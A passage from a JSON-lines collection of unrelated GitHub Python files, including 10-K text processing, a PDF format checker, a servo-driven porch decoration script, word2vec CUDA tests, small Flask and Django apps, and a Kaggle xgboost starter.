pd.read_csv(\"../text_data/risk_factors(title).csv\")\n unique_file = rf['filename'].unique()\n firm_ls = []\n for i in range(len(unique_file)):\n \n cur_index = rf.index[rf['filename'] == unique_file[i]][0]\n cur_firm = rf.iloc[cur_index]['firm']\n firm_ls.append(cur_firm)\n \n time_ls = []\n for i in range(len(unique_file)):\n cur_index = rf.index[rf['filename'] == unique_file[i]][0]\n cur_time = rf.iloc[cur_index]['time']\n time_ls.append(cur_time)\n new_rf = {\"filename\": list(unique_file), \"firm\": firm_ls, \"time\": time_ls}\n new_rf = pd.DataFrame(new_rf)\n \n new_rf.to_csv(\"../helper/ticker_rf_mapping.csv\")\n \n \n # Create concise business mapping\n item1_7_df = pd.read_csv(\"../text_data/ticker_item1_7_mapping.csv\", index_col = 0)\n item1_7_df = item1_7_df.dropna()\n con_item1_7 = item1_7_df[['filename', 'tic_in_comp', 'fdate', 'report_date']] \n \n con_item1_7.columns = ['filename', 'firm', 'time', 'report_date']\n con_item1_7['firm'] = con_item1_7['firm'].apply(lambda x: x.lower())\n con_item1_7['time'] = con_item1_7['time'].apply(lambda x: int(x.split(\"-\")[0]))\n con_item1_7.to_csv(\"../helper/ticker_item1_7_mapping.csv\") \n \n \n temp_file = con_item1_7['filename'].iloc[0]\n \n temp_file = temp_file.split(\".\") \n \n temp_item7 = temp_file[0] + \"_item7.txt\" \n \n temp_full_path = os.path.join(\"../text_data/item7MD&A\", temp_item7)\n \n os.path.isfile(temp_full_path)\n \n rf_map = pd.read_csv(\"../helper/ticker_rf_mapping.csv\", index_col = False)\n temp_rf = find_rf(\"a\", rf_map)\n \n item1_7_map = pd.read_csv(\"../helper/ticker_item1_7_mapping.csv\", index_col = False)\n temp_item1 = find_item1_7(\"a\", item1_7_map, \"1\", \"../text_data/item1business\")\n temp_item7 = find_item1_7(\"a\", item1_7_map, \"7\", \"../text_data/item7MD&A\")\n \n new1 = temp_rf.merge(temp_item1, on = 'time', how = 'inner')\n new2 = new1.merge(temp_item7, on = 'time', how = 'inner')\n new2.columns\n final_df = new2.drop(['ticker_x', 'ticker_y'], axis = 1)\n \n ticker_ls = load_ticker(\"../helper\", \"ticker_list.txt\")\n call_merge(ticker_ls, rf_map, item1_7_map, \"../text_data/10K_riskfactor\",\n \"../text_data/item1business\", \"../text_data/item7MD&A\", 
\"../stock_text\",\n \"../helper\")","repo_name":"Beast-Leon/Long-Term-Company-Growth-Prediction-using-NLP-Techniques-on-10-K-Financial-Filings","sub_path":"python code/data generation/process_text.py","file_name":"process_text.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34932720749","text":"import re\nfrom pdfparser.data_classes import Document, Line, Page\nfrom pdfparser.util import get_roman\n\ndef check_toc(document: Document):\n errors = []\n\n toc = document.toc\n\n for index, page in enumerate(toc):\n if page.lines[0].text.lower() != get_roman(page.pageid):\n errors.append(\"Table of content page \" + str(index) + \" should be enumarated with \" + get_roman(page.pageid) + \"!\")\n \n if toc[0].lines[1].text != \"TABLE OF CONTENTS\":\n errors.append(\"Table of contents section should start with header 'TABLE OF CONTENTS'!\")\n\n for index in range(1, len(toc)):\n toc[0].lines.extend(toc[index].lines[1:])\n\n is_two_line = False\n for index in range(2, len(toc[0].lines)):\n current_line: Line = toc[0].lines[index]\n\n if is_two_line:\n is_two_line = False\n continue\n\n if current_line.text[0].isdigit():\n if re.search(r\"(\\. )+[\\d]+$\", current_line.text) == None:\n if toc[0].lines[index+1].text[0].isdigit():\n print(toc[0].lines[index])\n errors.append(\"Misalignment in the points of line \" + current_line.text + \"!\")\n else: \n if re.search(r\"(\\. )+[\\d]+$\", toc[0].lines[index+1].text) == None:\n errors.append(\"Missing page number for line \" + current_line.text + \"!\")\n is_two_line = True\n else:\n if re.search(r\"[mdclxvi]+$\", current_line.text) == None and not (current_line.text.startswith(\"REFERENCES\") or current_line.text.startswith(\"APPENDIX\")):\n print(current_line)\n errors.append(\"Preliminary pages should be enumerated with roman numbers.\")\n\n return errors\n\n","repo_name":"burakcanyesil/Cmpe492-Format-Checker","sub_path":"pdfparser/checker/toc.py","file_name":"toc.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"41956273022","text":"#!/usr/bin/python3\n\nimport sys, time, random\nfrom servo_controls import *\nfrom sh import tail\n\ndef zombie_motion():\n motions = [no_dont_think_so]\n selected_motion = random.randint(0,len(motions))\n try: \n motions[selected_motion]()\n except Exception as e:\n print(\"Error: unable to do random motion\")\n print(\" Exception: {0}\".format(e))\n return True\n\ndef main():\n # log file\n motion_log = \"/var/log/motion/motion.log\"\n\n # counter for random motions\n seconds = 0\n\n for line in tail(\"-f\", motion_log, _iter=True): \n if \"motion_detected\" in line: \n lrap() \n time.sleep(5) \n blrap()\n time.sleep(30)\n\n # do a check and if rights chance do some creepy moves :-)\n if seconds == 10:\n if random.randint(0,9) == 1:\n zombie_motion()\n seconds = 0\n else:\n seconds += 1\n\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"markcitron/porch_zombie","sub_path":"2020/not_using/waiting_zombie.py","file_name":"waiting_zombie.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21502220497","text":"import pandas as pd\nfrom scipy import stats\nfrom typing import Tuple\n\n\ndef is_significant(p_value: float, alpha: float = 0.05) -> bool:\n \"\"\"\n Check if the statistical 
test result is significant.\n\n Args:\n p_value (float):\n The p-value of the statistical test\n alpha (float, optional):\n The alpha level to compare the p-value to, defaults to 0.05.\n\n Returns:\n bool:\n True if the p-value is less than or equal to alpha, False otherwise\n \"\"\"\n return p_value <= alpha\n\n\ndef check_distribution(column: pd.Series, alpha: float = 0.05) -> str:\n # Use stats.kstest() for uniform, shapiro_wilk for normal\n mean = column.mean()\n std = column.std()\n size = column.size\n\n # Normality Test\n shapiro_significant = is_significant(stats.shapiro(column).pvalue, alpha)\n normality = \"not normal\" if shapiro_significant else \"normal\"\n\n # Uniformity Test\n uniform = stats.uniform.rvs(loc=mean, scale=std, size=size, random_state=1)\n ks_significant = is_significant(stats.kstest(rvs=column, cdf=uniform).pvalue, alpha)\n uniformity = \"not uniform\" if ks_significant else \"uniform\"\n\n return f\"{normality}, {uniformity}\"\n","repo_name":"jjz17/geeda","sub_path":"src/geeda/column/check_distribution.py","file_name":"check_distribution.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11682711683","text":"def selfn(a):\n answer = a\n arr = list(map(int, list(str(a))))\n answer += sum(arr)\n return answer\n\n\nvisited = [0]*10000\nfor i in range(1, 10000):\n s = selfn(i)\n if s < 10000:\n visited[selfn(i)] = 1\nfor idx, v in enumerate(visited):\n if idx == 0:\n continue\n if not v:\n print(idx)\n","repo_name":"ohtjqkd/algorithm","sub_path":"baekjoon/4673.py","file_name":"4673.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8401153848","text":"import math\nimport os\nimport sys\nfrom typing import List\n\nimport numpy as np\n\nimport pytest\nfrom pytest import fail\n\n# https://numba.readthedocs.io/en/stable/cuda/simulator.html\nos.environ[\"NUMBA_ENABLE_CUDASIM\"] = \"1\"\nfrom numba import cuda\nfrom numba.cuda import random as c_random\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../')))\nfrom myw2v.myw2v import BLANK_TOKEN\nfrom myw2v import myw2v\n\ntest_data_path = os.path.join(os.path.dirname(__file__), \"data\")\n\n\ndef test_build_vocab():\n vocab = myw2v.build_vocab(test_data_path)\n pleasures, total, sentences = list(filter(lambda t: t[0] == \"pleasures\", vocab))[0]\n # cat 0* | fgrep -c -i pleasures # 2\n # cat 0* | perl -pe 's/ /\\n/g' | fgrep -c -i pleasures # 3\n assert total == 3\n assert sentences == 2\n\n\ndef test_sort_vocab():\n orig = [(\"foo\", 1, 2), (\"bar\", 55, 2), (\"asdf\", 3, 3), (\"another_word\", 4, 1)]\n exp = [(BLANK_TOKEN, 0, 0), (\"bar\", 55, 2), (\"another_word\", 4, 1), (\"asdf\", 3, 3), (\"foo\", 1, 2)]\n assert exp == myw2v.sort_vocab(orig)\n\n\ndef test_prune_vocab():\n orig = [(\"foo\", 1, 2), (\"bar\", 55, 2), (\"asdf\", 3, 3), (\"another_word\", 4, 1)]\n result1 = myw2v.prune_vocab(min_occrs=1, my_vocab=orig)\n assert result1 == [(word, total) for word, total, _ in orig]\n result2 = myw2v.prune_vocab(min_occrs=2, my_vocab=orig)\n assert result2 == [(\"foo\", 1), (\"bar\", 55), (\"asdf\", 3)]\n\n\ndef test_bias_freq_counts():\n def assert_words_and_close_enough_freqs(act, exp):\n assert [word for word, _ in act] == [word for word, _ in exp]\n for i in range(0, len(exp)):\n _, fact = act[i]\n _, fexp = exp[i]\n assert close_enough(fact, fexp), f\"At index {i} 
actual was {fact}, expected {fexp}\"\n words = [BLANK_TOKEN, \"pie\", \"apple\", \"mince\", \"beef\", \"delicious\"]\n freqs = [0, 3, 2, 2, 1, 1]\n vocab = list(zip(words, freqs))\n freqs_basic = list(zip(words, [0, 3/9, 2/9, 2/9, 1/9, 1/9]))\n result1 = myw2v.bias_freq_counts(vocab, exponent=1.0)\n print(result1)\n assert_words_and_close_enough_freqs(result1, freqs_basic)\n result2 = myw2v.bias_freq_counts(vocab, exponent=0.75)\n print(result2)\n q2 = [math.pow(q, 0.75) for q in freqs]\n assert_words_and_close_enough_freqs(result2, list(zip(words, [f/sum(q2) for f in q2])))\n result3 = myw2v.bias_freq_counts(vocab, exponent=0.444)\n print(result3)\n q3 = [math.pow(q, 0.444) for q in freqs]\n assert_words_and_close_enough_freqs(result3, list(zip(words, [f/sum(q3) for f in q3])))\n\n\ndef test_calc_subsampling_weights():\n vocab = [('pie', 3), ('apple', 2), ('mince', 2), ('beef', 1), ('delicious', 1)]\n s = sum([c for _, c in vocab])\n freqs = [c/s for _, c in vocab]\n\n t1 = 1e-5\n expected1 = [1-math.sqrt(t1/freq) for freq in freqs]\n weights1, _ = myw2v.get_subsampling_weights_and_negative_sampling_array(vocab, t=t1)\n print(f\"EXPECTED 1: {expected1}\")\n print(f\"WEIGHTS 1: {weights1}\")\n assert_all_close_enough(weights1, expected1)\n\n t2 = 1e-5\n f = 500000\n vocab2 = [(\"pie\", f), (\"apple\", 1)]\n expected2_ = [1-math.sqrt(t2/freq) for freq in [f/(f+1), 1/(f+1)]]\n # when freq < t, might go negative, check that we guard against that\n expected2 = [q if q >= 0 else 0 for q in expected2_]\n weights2, _ = myw2v.get_subsampling_weights_and_negative_sampling_array(vocab2, t=t2)\n print(f\"EXPECTED 2: {expected2}\")\n print(f\"WEIGHTS 2: {weights2}\")\n assert_all_close_enough(weights2, expected2)\n\n\ndef test_weight_init():\n vocab_size = 12345\n for seed in 1234, 12345, 123456, 999:\n for emb_dim in [1, 10, 100]:\n # numpy, no cuda, btw\n w1, w2 = myw2v.init_weight_matrices(vocab_size, emb_dim, seed=seed)\n assert_weights(w1, w2, emb_dim)\n\n\ndef test_step():\n # if the test data is all roughly the same magnitude, then the learning will proceed as expected -\n # if one or two of these vectors is say 0.01 or something, then one or more gradients will get inverted.\n # this is fine of course, but in a unit test it can be a bit awkward heh\n emb = np.array([\n [0, 0],\n [-0.1, 0.1],\n [0.1, -0.1],\n [0.2, 0.4],\n [-0.3, -0.2]\n ], dtype=np.float32)\n emb2 = np.array([\n [0, 0],\n [0.2, -0.5],\n [-0.2, 0.3],\n [0.1, 0.7],\n [-0.4, 0.1]\n ], dtype=np.float32)\n emb_dim = emb.shape[1] # 3 vectors of dim 2 each, so this is 2\n k = 2\n thread_idx = 0\n vocab_size = emb.shape[0]\n neg_smpl_arr = [1, 1, 1, 1, 2, 2]\n # with this seed the first rnd will be 0.26615933 which ^ results in 1 from this arr\n # second: 0.81275994 -> 2\n q_expected = [1, 2]\n x = 3\n y = 4\n lr = 0.2\n calc_aux = cuda.to_device(np.zeros((vocab_size, emb_dim), dtype=np.float32))\n random_states_init_cuda = c_random.create_xoroshiro128p_states(vocab_size, seed=12345)\n neg_smpl_arr_cuda = cuda.to_device(neg_smpl_arr)\n\n w1 = cuda.to_device(emb)\n w2 = cuda.to_device(emb2)\n print(f\"Initial: w1, shape {w1.shape}:\\n{w1}\")\n print(f\"Initial: w2, shape {w2.shape}:\\n{w2}\")\n\n # thread_idx, w1, w2, calc_aux, x, y, k, learning_rate, negsample_array, random_states # btw\n myw2v.step(thread_idx, w1, w2, calc_aux, x, y, k, lr, neg_smpl_arr_cuda, random_states_init_cuda)\n w1 = w1.copy_to_host()\n w2 = w2.copy_to_host()\n ca = calc_aux.copy_to_host()\n print(f\"Then: ca, shape {ca.shape}:\\n{ca}\")\n\n dot_pos = 
np.dot(emb[x,], emb2[y,])\n dot_neg_1 = np.dot(emb[x,], emb2[q_expected[0],])\n dot_neg_2 = np.dot(emb[x,], emb2[q_expected[1],])\n s_xdq_1 = 1./(1. + math.exp(-dot_neg_1))\n s_xdq_2 = 1./(1. + math.exp(-dot_neg_2))\n print(f\"x, y {emb[x,]} {emb2[y,]}, dot(x,y) = {dot_pos}\")\n print(f\"x, q {emb[x,]} {emb2[q_expected,]}, dot(x,q1) = {dot_neg_1}, dot(x,q2) = {dot_neg_2}\")\n print(f\"sigmoid(x dot q1) = {s_xdq_1}, -''- q2 = {s_xdq_2}\")\n print(f\"q orig = {emb2[q_expected,]}\")\n print(f\"q1 * sigmoid(x dot q1) = {emb2[q_expected[0],] * s_xdq_1}\")\n print(f\"q2 * sigmoid(x dot q2) = {emb2[q_expected[1],] * s_xdq_2}\")\n neg_samples_contrib_x = emb2[q_expected[0],] * s_xdq_1 + emb2[q_expected[1],] * s_xdq_2\n pos_sample_contrib_x = (1./(1. + math.exp(-np.dot(emb[x,], emb2[y,]))) - 1) * emb2[y,]\n gradient_x = neg_samples_contrib_x+pos_sample_contrib_x\n gradient_y = (1./(1. + math.exp(-np.dot(emb[x,], emb2[y,]))) - 1) * emb[x,]\n gradient_q1 = s_xdq_1 * emb[x,]\n gradient_q2 = s_xdq_2 * emb[x,]\n print(f\"neg_samples_contrib_x: {neg_samples_contrib_x}\")\n print(f\"pos_sample_contrib_x: {pos_sample_contrib_x}\")\n print(f\"GRADIENT, x: {gradient_x}\")\n print(f\"GRADIENT, y: {gradient_y}\")\n print(f\"GRADIENT, q1: {gradient_q1}\")\n print(f\"GRADIENT, q2: {gradient_q2}\")\n print(f\"x dot y, orig {np.dot(emb[x,], emb2[y,])} -> now {np.dot(w1[x,], w2[y,])}\")\n print(f\"x dot q1, orig {np.dot(emb[x,], emb2[q_expected[0],])} -> now {np.dot(w1[x,], w2[q_expected[0],])}\")\n print(f\"x dot q2, orig {np.dot(emb[x,], emb2[q_expected[1],])} -> now {np.dot(w1[x,], w2[q_expected[1],])}\")\n print(f\"x orig {emb[x,]} -> now {w1[x,]}: adjustment of {w1[x,]-emb[x,]} vs. lr*gradient {-lr*gradient_x}\")\n print(f\"y orig {emb2[y,]} -> now {w2[y,]}: adjustment of {w2[y,]-emb2[y,]} vs. lr*gradient {-lr*gradient_y}\")\n print(f\"q1 orig {emb2[q_expected[0],]} -> now {w2[q_expected[0],]}: adjustment of {w2[q_expected[0],]-emb2[q_expected[0],]} vs. lr*gradient {-lr*gradient_q1}\")\n print(f\"q2 orig {emb2[q_expected[1],]} -> now {w2[q_expected[1],]}: adjustment of {w2[q_expected[1],]-emb2[q_expected[1],]} vs. 
lr*gradient {-lr*gradient_q2}\")\n assert close_enough_(w1[x,]-emb[x,], -lr*gradient_x, 1e-5)\n assert close_enough_(w2[q_expected[0],]-emb2[q_expected[0],], -lr*gradient_q1, 1e-5)\n assert close_enough_(w2[q_expected[1],]-emb2[q_expected[1],], -lr*gradient_q2, 1e-5)\n assert np.dot(w1[x,], w2[y,]) > np.dot(emb[x,], emb2[y,])\n assert np.dot(w1[x,], w2[q_expected[0],]) < np.dot(emb[x,], emb2[q_expected[0],])\n assert np.dot(w1[x,], w2[q_expected[1],]) < np.dot(emb[x,], emb2[q_expected[1],])\n\n\ndef test_word2vec():\n # if the test data is all roughly the same magnitude, then the learning will proceed as expected -\n # if one or two of these vectors is say 0.01 or something, then one or more gradients will get inverted.\n # this is fine of course, but in a unit test it can be a bit awkward heh\n emb = np.array([\n [0, 0],\n [-0.1, 0.1],\n [0.1, -0.1],\n [0.2, 0.4],\n [-0.3, -0.2]\n ], dtype=np.float32)\n emb2 = np.array([\n [0, 0],\n [0.2, -0.5],\n [-0.2, 0.6],\n [0.1, 0.7],\n [-0.4, 0.1]\n ], dtype=np.float32)\n # no i don't necessarily trust myself with generating \"random\" test data why do you ask\n for i in range(1, emb.shape[0]):\n for j in range(1, emb.shape[0]):\n dot = float(np.dot(emb[i,], emb2[j,]))\n if close_enough(dot, 0, 1e-6):\n fail(f'Expecting test data to be \"naturally non-zeroing\" but got zero dot for emb[{i},] emb2[{j},] = {emb[i,]}, {emb2[j,]}')\n\n vocab_size = emb.shape[0]\n emb_dim = emb.shape[1]\n c = 1\n k = 1\n lr = 0.1\n threads_per_block = 16\n a, b = 3, 4\n subs_weights = [0.0, 0.6, 0.2, 0.15, 0.1]\n # TODO NOTE: depending on random seed & how many rng calls are made, the following could cause this test to fail:\n # TODO NOTE: see \"aux_out\" stuff for how to \"debug\" where the randoms fall on each run...\n neg_smpl_arr = [1, 1, 1, 1, 1, 1, 2, 2, 2, 2]\n q1, q2 = 2, 1\n inp = [a, b]\n rows = 1\n blocks: int = math.ceil(rows / threads_per_block)\n random_states_init_cuda = c_random.create_xoroshiro128p_states(vocab_size, seed=12345)\n w1 = cuda.to_device(emb)\n w2 = cuda.to_device(emb2)\n\n calc_aux = cuda.to_device(np.zeros((len(inp), emb_dim), dtype=np.float32))\n aux_out = cuda.to_device(np.zeros((threads_per_block, 2), dtype=np.float32))\n myw2v.calc[blocks, threads_per_block](rows, c, k, lr, w1, w2, calc_aux, random_states_init_cuda,\n cuda.to_device(subs_weights), cuda.to_device(neg_smpl_arr),\n cuda.to_device(inp), cuda.to_device([0]), cuda.to_device([2]))#,\n# aux_out)\n w1 = w1.copy_to_host()\n w2 = w2.copy_to_host()\n calc_aux = calc_aux.copy_to_host()\n print(f\"After: w1, shape {w1.shape}:\\n{w1}\")\n print(f\"After: w2, shape {w2.shape}:\\n{w2}\")\n print(f\"After: calc_aux, shape {calc_aux.shape}:\\n{calc_aux}\")\n print(f\"After: aux_out, shape {aux_out.shape}:\\n{aux_out}\")\n\n # DATA [3, 4] & q [1, 2] ->\n # 3 -> 4, q = 1: adjust w1[3]; adjust w2[4]; adjust w2[1]\n # 4 -> 3, q = 2: adjust w1[4]; adjust w2[3]; adjust w2[2]\n\n gradient_a1, gradient_b1, gradient_q1 = calc_contrib(emb, emb2, a, b, q1)\n print(f\"GRADIENT x={a} #1: {gradient_a1}\")\n print(f\"GRADIENT y={b} #1: {gradient_b1}\")\n print(f\"GRADIENT q={q1} #1: {gradient_q1}\")\n gradient_b2, gradient_a2, gradient_q2 = calc_contrib(emb, emb2, b, a, q2)\n print(f\"GRADIENT x={b} #2: {gradient_b2}\")\n print(f\"GRADIENT y={a} #2: {gradient_a2}\")\n print(f\"GRADIENT q={q2} #2: {gradient_q2}\")\n\n print(f\"{a} dot {b}, orig {np.dot(emb[a,], emb2[b,])} -> now {np.dot(w1[a,], w2[b,])}\")\n print(f\"{a} dot {q1}, orig {np.dot(emb[a,], emb2[q1,])} -> now {np.dot(w1[a,], w2[q1,])}\")\n 
print(f\"{b} dot {q2}, orig {np.dot(emb[b,], emb2[q2,])} -> now {np.dot(w1[b,], w2[q2,])}\")\n print(f\"{a} #1 orig {emb[a,]} -> now {w1[a,]}: adjustment of {w1[a,] - emb[a,]} vs. lr*gradient {-lr * gradient_a1}\")\n print(f\"{b} #2 orig {emb2[b,]} -> now {w2[b,]}: adjustment of {w2[b,] - emb2[b,]} vs. lr*gradient {-lr * gradient_b1}\")\n print(f\"{b} #1 orig {emb[b,]} -> now {w1[b,]}: adjustment of {w1[b,] - emb[b,]} vs. lr*gradient {-lr * gradient_b2}\")\n print(f\"{a} #2 orig {emb2[a,]} -> now {w2[a,]}: adjustment of {w2[a,] - emb2[a,]} vs. lr*gradient {-lr * gradient_a2}\")\n print(f\"{q1} orig {emb2[q1,]} -> now {w2[q1,]}: adjustment of {w2[q1,] - emb2[q1,]} vs. lr*gradient {-lr * gradient_q1}\")\n print(f\"{q2} orig {emb2[q2,]} -> now {w2[q2,]}: adjustment of {w2[q2,] - emb2[q2,]} vs. lr*gradient {-lr * gradient_q2}\")\n assert close_enough_(w1[a,] - emb[a,], -lr * gradient_a1, 1e-5)\n assert close_enough_(w2[q1,] - emb2[q1,], -lr * gradient_q1, 1e-5)\n assert close_enough_(w2[q2,] - emb2[q2,], -lr * gradient_q2, 1e-5)\n assert np.dot(w1[a,], w2[b,]) > np.dot(emb[a,], emb2[b,])\n assert np.dot(w1[a,], w2[q1,]) < np.dot(emb[a,], emb2[q1,])\n assert np.dot(w1[b,], w2[q2,]) < np.dot(emb[b,], emb2[q2,])\n\n\ndef calc_contrib(emb, emb2, inp, outp, q1):#, q2):\n dot_pos = np.dot(emb[inp,], emb2[outp,])\n dot_neg_1 = np.dot(emb[inp,], emb2[q1,])\n s_xdq_1 = 1. / (1. + math.exp(-dot_neg_1))\n neg_samples_contrib_x = emb2[q1,] * s_xdq_1\n pos_sample_contrib_x = (1. / (1. + math.exp(-dot_pos)) - 1) * emb2[outp,]\n gradient_x = neg_samples_contrib_x + pos_sample_contrib_x\n gradient_y = (1. / (1. + math.exp(-dot_pos)) - 1) * emb[inp,]\n gradient_q1 = s_xdq_1 * emb[inp,]\n return gradient_x, gradient_y, gradient_q1\n\n\ndef get_file_contents(path) -> List[str]:\n with open(path, \"r\") as f:\n l = f.readlines()\n l2 = [line.strip() for line in l]\n l3 = [line for line in l2 if line]\n return l3\n\n\ndef close_enough(x: float, tgt: float, tol: float = 1e-6) -> bool:\n return abs(x-tgt) <= tol\n\n\ndef assert_all_close_enough(act, exp):\n for i in range(0, len(exp)):\n fact = act[i]\n fexp = exp[i]\n assert close_enough(fact, fexp), f\"At index {i} actual was {fact}, expected {fexp}\"\n\n\ndef close_enough_(x: np.ndarray, tgt: np.ndarray, tol: float) -> bool:\n return (abs(x-tgt) <= tol).all()\n\n\ndef assert_weights(w1, w2, emb_dim):\n muw1 = float(np.mean(w1[1:, :]))\n muw2 = float(np.mean(w2[1:, :]))\n varw1 = float(np.var(w1[1:, :]))\n varw2 = float(np.var(w2[1:, :]))\n print(f\"Mean w1 {muw1} w2 {muw2} / variance w1 {varw1} w2 {varw2} (NOTE: emb_dim {emb_dim})\")\n # first vector = blank token\n assert (w1[0, :] == 0).all()\n assert (w2[0, :] == 0).all()\n assert close_enough(muw1, 0, 1/(3.3333*emb_dim))\n assert close_enough(muw2, 0, 1/(3.3333*emb_dim))\n assert close_enough(varw1, 1/emb_dim, 1/(3.3333*emb_dim))\n assert close_enough(varw2, 1/emb_dim, 1/(3.3333*emb_dim))\n","repo_name":"tsaastam/myw2v","sub_path":"tests/myw2v_test.py","file_name":"myw2v_test.py","file_ext":"py","file_size_in_byte":14473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"74743076641","text":"from flask import Flask, request, render_template,flash\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.config[\"APPLICATION_ROOT\"] = \"/\"\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef main():\n if request.method == \"POST\":\n print(request.form.get('lat'))\n print(request.form.get('long'))\n lat = request.form.get('lat')\n long = 
request.form.get('long')\n error = None\n if error is not None:\n flash(error)\n return render_template('base.html', lat=lat, long=long)\n else:\n return render_template('base.html')\n","repo_name":"marshj2/Plot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6876835822","text":"import os\n\ndef setGameDirVar(var):\n global gameDirVar\n gameDirVar = var\n\ndef execute(totalblocks, entity_list,skybox, skyboxgeolist, light):\n compiledblocks=''\n totalentities=''\n beg_template = open(gameDirVar+'prefab_template/beginning_template.txt', 'r+')\n beg_template = beg_template.readlines()\n beg_template = \"\".join(beg_template)\n beg_template = beg_template.replace('CURRENT_SKYBOX',skybox)\n skyboxgeolist = \"\".join(skyboxgeolist)\n end_template = \"\"\" \ncameras\n{\n \"activecamera\" \"-1\"\n}\ncordon\n{\n \"mins\" \"(-10240 -10240 -10240)\"\n \"maxs\" \"(10240 10240 10240)\"\n \"active\" \"0\"\n}\n \"\"\"\n #end of file template that ends each vmf\n #print(totalblocks)\n compiledblocks = \"\".join(totalblocks) #totalblocks will be a list of each \"block\" from each chunk in the map, put into 1 string here.\n for i in range(compiledblocks.count(\"world_id_num\")):\n compiledblocks = compiledblocks.replace(\"world_id_num\",str(i),1) \n for i in range(compiledblocks.count(\"id_num\")):\n compiledblocks = compiledblocks.replace(\"id_num\",str(i),1)\n totalentities = \"\".join(entity_list)\n compiledblocks = compiledblocks.replace('EMPTY_SLOT','')\n #totalentities = \"\".join(entity_list)\n totalentities = totalentities.replace('NO_ENTITY','')\n whole = beg_template + compiledblocks + skyboxgeolist + \"}\\n\"+totalentities + light + end_template\n #whole = beg_template + compiledblocks + \"}\\n\"+ end_template\n \n\n return whole\n\ngameDirVar=''\n","repo_name":"baldengineers/mapper","sub_path":"export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31829792238","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom app.models import *\n\n# Create your views here.\ndef insert_Topic(request):\n tn=input('enter topic_name: ')\n TO=Topic.objects.get_or_create(topic_name=tn)[0]\n TO.save()\n return HttpResponse('Topic Inserted Successfully')\n\ndef insert_Webpage(request):\n tn=input('enter Topic_name: ')\n name=input('enter name: ')\n url=input('enter url: ')\n email=input('enter email: ')\n TO=Topic.objects.get_or_create(topic_name=tn)[0]\n TO.save()\n WO=Webpage.objects.get_or_create(topic_name=TO,name=name,url=url,email=email)[0]\n WO.save()\n return HttpResponse('Webpage Data Inserted Successfully')\n\ndef insert_AccessRecord(request):\n tn=input('enter Topic_name: ')\n name=input('enter name: ')\n url=input('enter url: ')\n author=input('enter author name: ')\n date=input('enter date: ')\n TO=Topic.objects.get_or_create(topic_name=tn)[0]\n TO.save()\n WO=Webpage.objects.get_or_create(topic_name=TO,name=name,url=url,email=email)[0]\n WO.save()\n AO=AccessRecord.objects.get_or_create(name=WO,author=author,date=date)[0]\n AO.save()\n return HttpResponse('AccessRecord Inserted 
Successfully')\n\n","repo_name":"supraja-maddineni/models_insert_data_by_views","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2585925295","text":"import kagglegym\r\nimport numpy as np\r\nimport pandas as pd\r\nimport xgboost as xgb\r\n\r\n# The \"environment\" is our interface for code competitions\r\nenv = kagglegym.make()\r\n\r\n# We get our initial observation by calling \"reset\"\r\nobservation = env.reset()\r\n\r\n## features\r\nfeat = ['fundamental_11', 'technical_19', 'technical_20', 'technical_30']\r\n\r\n## training data\r\ndtrain = xgb.DMatrix(observation.train[feat], label = observation.train['y'].values)\r\n\r\n## parameters\r\nparam = {'booster': 'gbtree',\r\n 'objective': 'reg:linear',\r\n 'learning_rate': 0.025,\r\n 'max_depth': 2,\r\n 'subsample': 0.5,\r\n 'colsample_bytree': 0.7,\r\n 'colsample_bylevel': 0.7,\r\n 'silent': 1\r\n}\r\n\r\n## train model\r\nprint('train model...')\r\nbst = xgb.train(params = param,\r\n dtrain = dtrain,\r\n num_boost_round = 500)\r\n\r\nprint('predicting...')\r\nwhile True:\r\n timestamp = observation.features['timestamp'][0]\r\n target = observation.target\r\n dtest = xgb.DMatrix(observation.features[feat])\r\n pred = bst.predict(dtest)\r\n observation.target.y = pred\r\n \r\n if timestamp % 100 == 0:\r\n print('Timestamp #{}'.format(timestamp))\r\n \r\n # We perform a \"step\" by making our prediction and getting back an updated \"observation\":\r\n observation, reward, done, info = env.step(target)\r\n if done:\r\n print('Public score: {}'.format(info['public_score']))\r\n break\r\n ","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/two-sigma-financial-modeling/Danijel Kivaranovic/simple-xgboost-starter.py","file_name":"simple-xgboost-starter.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"36368900927","text":"\nfrom selenium import webdriver\n\n\n# from pruebas-UI-SisDNA.diccionarios.diccionarios_SisDNA import diccionarios_SisDNA\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nimport time\n\n##############################################################################################################\n#MOVIMIENTOS EN EL SISTEMA:\n# 1. 